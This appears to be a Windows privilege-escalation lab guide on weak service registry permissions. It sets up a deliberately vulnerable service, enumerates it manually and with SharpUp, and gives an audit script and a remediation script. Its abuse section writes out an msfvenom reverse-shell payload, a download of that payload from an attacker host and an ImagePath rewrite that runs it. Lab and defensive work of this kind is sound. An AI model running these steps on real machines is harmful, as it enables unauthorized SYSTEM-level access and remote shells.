Weak registry permissions represent a vulnerability within the Windows registry resulting from misconfigured access controls. This issue involves specific registry keys or entries having permissions that permit unauthorized users to manipulate or access crucial system configurations. This vulnerability can be exploited by attackers who inject malicious code into registry keys, thus obtaining unauthorized privileged access.
- Open a PowerShell with local Administrator privileges and use the following command to create a new folder:
mkdir "C:\Program Files\CustomSrv4\"
- Download the file Service4.exe to the 'C:\Program Files\CustomSrv4' directory.
- Install the new service:
New-Service -Name "Vulnerable Service 4" -BinaryPathName "C:\Program Files\CustomSrv4\Service4.exe" -DisplayName "Vuln Service 4" -Description "My Custom Vulnerable Service 4" -StartupType Automatic
- Edit new service's permissions to be controlled by BUILTIN\Users:
cmd.exe /c 'sc sdset "Vulnerable Service 4" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWP;;;BU)'
Outcome:
- Open the Registry Editor with the regedit command and navigate to 'Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4':
- Right click on "Vulnerable Service 4" and choose the "permissions" option:
- Allow Full Access control on Users and then press "OK" button:
Alternatively, the lab with the 'Weak Registry Permissions' vulnerability can be set up using the custom PowerShell script named WeakRegistryPermissions.ps1.
- Open a PowerShell with local Administrator privileges and run the script:
.\WeakRegistryPermissions.ps1
Outcome:
To perform manual enumeration of the Weak Registry Permissions
vulnerability, you can use the following steps:
- Open a PowerShell and use the following command to enumerate the permissions of the service's registry key:
Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" | fl
- Use the following command to identify the image path of the service:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"
Outcome:
To run the SharpUp tool and perform an enumeration of the Weak Registry Permissions
vulnerability, you can execute the following command with appropriate arguments:
SharpUp.exe audit ModifiableServiceRegistryKeys
Outcome:
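The Get-Acl and reg query commands above inspect one key by hand, and SharpUp's ModifiableServiceRegistryKeys check does the same across all services. The following PowerShell script is an added example for administrators (it is not part of the lab and is not SharpUp's code): it walks every key under HKLM:\SYSTEM\CurrentControlSet\Services and reports the services whose configuration key grants write rights to low-privileged principals, together with the ImagePath each key points to. The function name Get-WeakServiceRegistryKey, the list of principals treated as low-privileged and the bit mask of rights treated as "write" are my choices; run it from an elevated PowerShell so that every key's ACL can be read.

```powershell
# Added example (not part of the original lab): audit service registry keys for
# ACEs that let low-privileged principals rewrite values such as ImagePath.
$servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Principals that should never hold write rights on a service configuration key
# (assumed list; extend it for local groups specific to your environment).
$lowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'Everyone'
)

# Rights that allow changing the key's values or its ACL. Read-only rights
# (QueryValues, EnumerateSubKeys, Notify, ReadPermissions) are deliberately
# excluded so the default "Users: Read" ACE is not reported as a finding.
$writeRights = [int](
    [System.Security.AccessControl.RegistryRights]::SetValue -bor
    [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
    [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
    [System.Security.AccessControl.RegistryRights]::TakeOwnership
)
# Some ACEs carry generic rights instead of registry-specific ones:
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) both imply write access.
$genericWriteMask = 0x40000000 -bor 0x10000000

function Get-WeakServiceRegistryKey {
    param([string]$Root = $servicesRoot)

    Get-ChildItem -Path $Root -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        try {
            $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop
        } catch {
            return   # keys whose ACL cannot be read are skipped for this iteration
        }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $principal = $ace.IdentityReference.Value
            if ($lowPrivPrincipals -notcontains $principal) { continue }

            $rights = [int]$ace.RegistryRights
            $hasWrite = (($rights -band $writeRights) -ne 0) -or
                        (($rights -band $genericWriteMask) -ne 0)
            if (-not $hasWrite) { continue }

            # ImagePath is the value an attacker would rewrite; show it so the
            # reviewer can see which binary the weak key currently protects.
            $imagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath `
                          -ErrorAction SilentlyContinue).ImagePath

            [PSCustomObject]@{
                Service   = $key.PSChildName
                Principal = $principal
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                ImagePath = $imagePath
            }
        }
    }
}

Get-WeakServiceRegistryKey | Format-Table -AutoSize
```

On the lab machine the output should contain a row for 'Vulnerable Service 4' with BUILTIN\Users holding FullControl; after the permissions are corrected as described in the defence section, re-running the script should return no row for that service, which makes it a convenient post-remediation check. A row whose Inherited column is True means the weak ACE comes from a parent key and has to be corrected there rather than on the service key itself.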
To abuse this vulnerability you should follow these steps:
- Create a malicious executable with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=1234 -f exe > Service4.exe
- Open a listener on your Kali machine.
- Transfer the malicious executable to the victim's machine:
iwr -Uri http://<ip>:<port>/Service4.exe -Outfile C:\Windows\Tasks\Service4.exe
- Change the image path of the service:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\Tasks\Service4.exe" /f
- Start the service with the following command or reboot the machine:
sc start "Vulnerable Service 4"
Outcome:
- Verify the reverse shell on your Kali machine:
To defend against Weak Registry Permissions vulnerabilities, correct the permissions on the affected registry keys so that low-privileged users can no longer write to them. This limits unauthorized access and strengthens security measures:
- Open the Registry Editor with the regedit command and navigate to 'Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4'.
- Right click on "Vulnerable Service 4" and choose the "permissions" option.
- Remove the checkmark from the 'Full Control' box assigned to 'Users', then click the 'OK' button.
Alternatively, you can use the following PowerShell script:
# Define the registry key path
$regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"
# Get the current ACL (Access Control List) for the registry key
$acl = Get-Acl -Path $regKey
# Specify the account and access rights to be removed
$account = "BUILTIN\Users"
$accessRights = [System.Security.AccessControl.RegistryRights]::FullControl
# Build a rule matching the explicit FullControl ACE the lab granted to Users.
# It must be an "Allow" rule: RemoveAccessRule only strips rights from ACEs of the
# same type, so a "Deny" rule would match nothing and leave the weak permission in place.
# ContainerInherit matches the "This key and subkeys" scope that regedit applies.
$accessRule = New-Object System.Security.AccessControl.RegistryAccessRule(
    $account, $accessRights,
    [System.Security.AccessControl.InheritanceFlags]::ContainerInherit,
    [System.Security.AccessControl.PropagationFlags]::None,
    [System.Security.AccessControl.AccessControlType]::Allow)
# Remove the explicit rule from the ACL; inherited ACEs such as the default Read access are untouched
if (-not $acl.RemoveAccessRule($accessRule)) {
    Write-Warning "No explicit FullControl ACE for $account was found on $regKey"
}
# Set the modified ACL back to the registry key
Set-Acl -Path $regKey -AclObject $acl
# Confirm that Users now holds only the inherited Read access on the key
(Get-Acl -Path $regKey).Access | Where-Object { $_.IdentityReference -eq $account } |
    Format-List IdentityReference, RegistryRights, IsInherited